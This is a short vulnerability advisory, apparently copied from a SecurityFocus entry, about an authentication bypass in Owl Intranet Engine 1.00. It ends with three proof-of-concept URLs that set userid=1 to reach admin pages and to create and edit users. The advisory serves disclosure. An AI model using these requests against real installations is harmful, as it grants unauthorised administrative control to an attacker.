11 lines
No EOL
528 B
Text
11 lines
No EOL
528 B
Text
source: http://www.securityfocus.com/bid/51076/info
|
|
|
|
Owl Intranet Engine is prone to an authentication-bypass vulnerability.
|
|
|
|
An attacker can exploit this issue to bypass the authentication process and gain administrative access to the application.
|
|
|
|
Owl Intranet Engine 1.00 is affected; other versions may also be vulnerable.
|
|
|
|
http://www.example.org/owl/admin/index.php?userid=1
|
|
http://www.example.org/owl/admin/index.php?userid=1&newuser
|
|
http://www.example.org/owl/admin/index.php?userid=1&action=edituser&owluser=1 |